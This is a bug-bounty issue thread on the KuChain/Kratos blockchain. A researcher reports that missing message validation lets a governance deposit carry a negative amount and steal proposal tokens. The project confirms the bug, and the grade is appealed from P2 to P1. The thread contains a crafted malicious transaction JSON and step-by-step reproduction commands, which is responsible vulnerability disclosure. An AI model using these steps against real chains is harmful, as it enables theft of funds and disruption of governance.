Amount of Deposit can be negative in gov module

Describe The Bug
there is missing sanity check of Deposit msg in gov module.
governance could be disrupted
token of proposals could be stolen

Code Snippets
so Kratos has implement a ValidateBasic function to Check sanity of Deposit msg, but it's not called on the server side

what we expected is ensure msg.Amount can not be Negatived

func (msg MsgDeposit) ValidateBasic() error {
	if msg.Depositor.Empty() {
		return sdkerrors.Wrap(sdkerrors.ErrInvalidAddress, msg.Depositor.String())
	}
	if !msg.Amount.IsValid() {
		return sdkerrors.Wrap(sdkerrors.ErrInvalidCoins, msg.Amount.String())
	}
	if msg.Amount.IsAnyNegative() {
		return sdkerrors.Wrap(sdkerrors.ErrInvalidCoins, msg.Amount.String())
	}

	return nil
}

what we implemented, is a basic check of Transactions which merely ensure the length of signatures equal to signers'

func (tx StdTx) ValidateBasic() error {
	stdSigs := tx.GetSignatures()

	if tx.Fee.Gas > maxGasWanted {
		return errors.Wrapf(ErrGasOverflow, "%d > %d", tx.Fee.Gas, maxGasWanted)
	}
	if tx.Fee.Amount.IsAnyNegative() {
		return errors.Wrapf(ErrInsufficientFee, "%s amount provided", tx.Fee.Amount)
	}
	if len(stdSigs) == 0 {
		return ErrNoSignatures
	}
	if len(stdSigs) != len(tx.GetSigners()) {
		return ErrUnauthorized
	}

	return nil
}

there is no check of msg.Amount.
thus, malicious transaction with a negatived Amount can be preformed normally.

Input/Output

1. input: command line like this

{"chain_id":"testing","account_number":"0","sequence":"10","fee":{"amount":[{"denom":"kratos/kts","amount":"2000"}],"gas":"200000","payer":"kratos"},"msg":[{"type":"kuchain/kuMsgDeposit","value":{"KuMsg":{"auth":["kts1w6lahmwtrn62r23an5uw3cx0glf3nv57w7m3c6"],"from":"kratos","to":"kugov","amount":[{"denom":"kratos/kts","amount":"-1234567"}],"router":"kugov","action":"deposit","data":"M5usx9EIARITChEBAQYtIFQ9MAAAAAAAAAAAABoWCgprcmF0b3Mva3RzEggtMTIzNDU2Nw=="}}}],"memo":""}

2. output: a normal response like this

height: 0
txhash: 7E4F80826A9AD20762D680CABF1DE2F11B28AB2F2FB7A92939E0B4E730759CAC
codespace: ""
code: 0
data: ""
rawlog: '[]'
logs: []
info: ""
gaswanted: 0
gasused: 0
tx: null
timestamp: ""

To Reproduce

1. found this in x/gov/client/cli:

// Get amount of coins
			amount, err := sdk.ParseCoins(args[2])

add amount[0].Amount = sdk.NewInt(-1234567) after that.

and save the file
2. ReMake ktscli in kratos root directory
3. run command line like this:
./build/ktscli tx kugov deposit kratos 1 "10000kratos/kts" --keyring-backend test --chain-id testing --home ./testing/cli/ --from kratos

cause of the remake, Amount of deposit in command line can be set with Arbitrary number.
4. check the Amount of Proposals
run command line like ./build/ktscli query kugov proposals
and you would get this

ヽ(✿ﾟ▽ﾟ)ノ
deposit of the Proposal which id equal to 1 is negatived! governance disrupted!

5. And finally, check your asset
   ./build/ktscli query asset coins kratos
   
   Nice! Tokens used to belong to the Proposals is now yours.

Expected Behavior
Proposals deposit could not withdraw.
Above all, Kratos need call msg.ValidateBasic at the right place.(maybe in anteHandler )

Desktop

• OS: MACOS catalina 10.15.6

Additional Context
Quietly tell you , no ValidateBasic was called securely.
u need a overhaul
눈v눈
(Set Your Heart at Rest, I will issue other vulnerabilities as well. you could fix them easily

Contact Information
congfei.li@chaitin.com

@pandatea good job, also found same bug in module tx asset transfer. I think validate msgs in cli and rpc is unreliable. suggest validate every params in the start of keeper. It is strongly recommended to check each module params.

reason of this vulnerability is not complete same as tx asset transfer
in issue#13,tx asset transfer called ValidateBasic on the server side actually. what going wrong is that the ValidateBasic of transferMsg is not functioning. ( transfer.ValidateBasic fail to check amount)
but in issue#14, the associative ValidateBasic is not callable.

so, in summary, the problem of issue#13's is that the check isn't functioning , but problem of issue#14 is validate function can not be called.
(issue#13 是 validate函数没检查全，而issue#14是 对应的validate函数没有调用

Setting arguments negative is just a way to bypass the sanity check. that isn't mean we can add a check of sign to repair this.
Such as ,the way to fix issue#13 is Add a check of sign in the function stdTx.ValidateBasic
but the way to fix issue#14 is restructure the KuMsg
(´▽`ʃ♡ƪ) it's different~

Ahhh. finally....i'm a little tired to list all of the Vulnerability which caused to the msg.ValidateBasic has not be called.
here's a example with MsgUnjail

For major calling for ValidateBasic function that kratos make a mistaking call of the StdTx.ValidateBasic when it should call the msg.ValidateBasic actually.
kratos need overhaul for all Msg handlers.

[Pisces-Anjou]

Hi

Thanks for your submission.
We have tested the issue you mentioned and did reproduce it.
This is a valid vulnerability. After evaluation, this vulnerability has been graded as P2.
Please pay attention to the announcement to get your rewards.
Thanks for your attention and contribution. Please keep trying and help us improve our chain.

Regards
KuChain Team

Hi

Thanks for your submission.
We have tested the issue you mentioned and did reproduce it.
This is a valid vulnerability. After evaluation, this vulnerability has been graded as P2.
Please pay attention to the announcement to get your rewards.
Thanks for your attention and contribution. Please keep trying and help us improve our chain.

Regards
KuChain Team

关于ValidateBasic检测绕过的漏洞定级过低的申诉

Abstract

issue#14中(#14)
描述了ValidateBasic函数调用错误导致的参数合理性检查失效。
该漏洞危害十分严重，但最终的定级只定到了p2级别。

私以为该定级结果不合理，理由有二:

一、不符合kuchain众测的漏洞定级标准

该漏洞被定为p2级别,我们来开一下kuchain项目对漏洞的p2评级标准的描述:

Denial of service of any Chain validator node.
Vulnerabilities that could undermine or disrupt trading or token economy.
Vulnerabilities that could disrupt the Validator consensus result and performance.
Vulnerabilities that could cause the node to be unable to respond with transactions and balances.

在本漏洞的攻击场景举例中，我提到了gov模块的Deposit消息的Amount参数可以设为负数，导致任意盗币，并摧毁kuchain的管理机制。
P2标准中第1、3、4条与本举例无关，第二条破坏金融系统运行和本举例勉强相关，但危害程度的描述不符(本漏洞无任何限制，可对任何人发起任意数量的盗币，满足P1级别中的severely描述)

在P1(Critical)定级标准中，有描述如下:

1.Vulnerabilities that could undermine the safety of any user or validator's fund/fee.
2.Vulnerabilities that could severely undermine trading or token economy.
3.Remote Code Execution on any Chain node, such as Validator nodes, Witness nodes, or Seed nodes.
4.Vulnerabilities related to key generation, encryption, decryption, signing and verification.
5.Vulnerabilities that could disrupt the Chain governance.
6.Transaction origin spoofing or transaction malleability.

gov漏洞的两点危害符合上述Critical标准中的第1、2、5 共三条，
即

摧毁其他用户资产的安全性
严重影响金融系统运行
破坏链管理机制

可见应该定级为P1(Critical)

二、该issue是多个原理相同的漏洞的总结

在https://github.com/KuChainNetwork/Project-Deluge/issues/14中，我只举例了gov模块的deposit消息，但其他模块的其他消息存在同样的问题。
因原理类似，所以在这个issue中进行了汇总。
为了清晰的描述该类问题，我在 comment:https://github.com/KuChainNetwork/Project-Deluge/issues/14#issuecomment-667065123中使用unjail消息进行了举例。
在验证消息参数的合理性时，应调用msg的ValidateBasic函数，而非kuchain当前版本中使用的StdTx.ValidateBasic函数。
该问题意味着当前版本的kuchain缺失了大部分msg的参数合理性检查，这个问题十分严重。

总结

根据kuchain项目的漏洞定级标准，该漏洞应危害定为P1级别。
此外issue14是一个总结型的漏洞描述，除了举例的gov模块，其他模块的所有消息都存在相似的问题。需要对代码进行全面更新。

[Pisces-Anjou]

Hi,

We have received your appeal. Our jury will evaluate it again. We will inform you with the final result.
Thanks for your attention and contribution! Please keep trying and help us improve our chain.

Redards
KuChain Team

[Pisces-Anjou]

Hi,

After evaluation by the jury, your vulnerability has been graded as P1.
Please pay attention to the announcement and your email to get your rewards.
Thanks for your attention and contribution! Please keep trying and help us improve our chain.

Regards
KuChain Team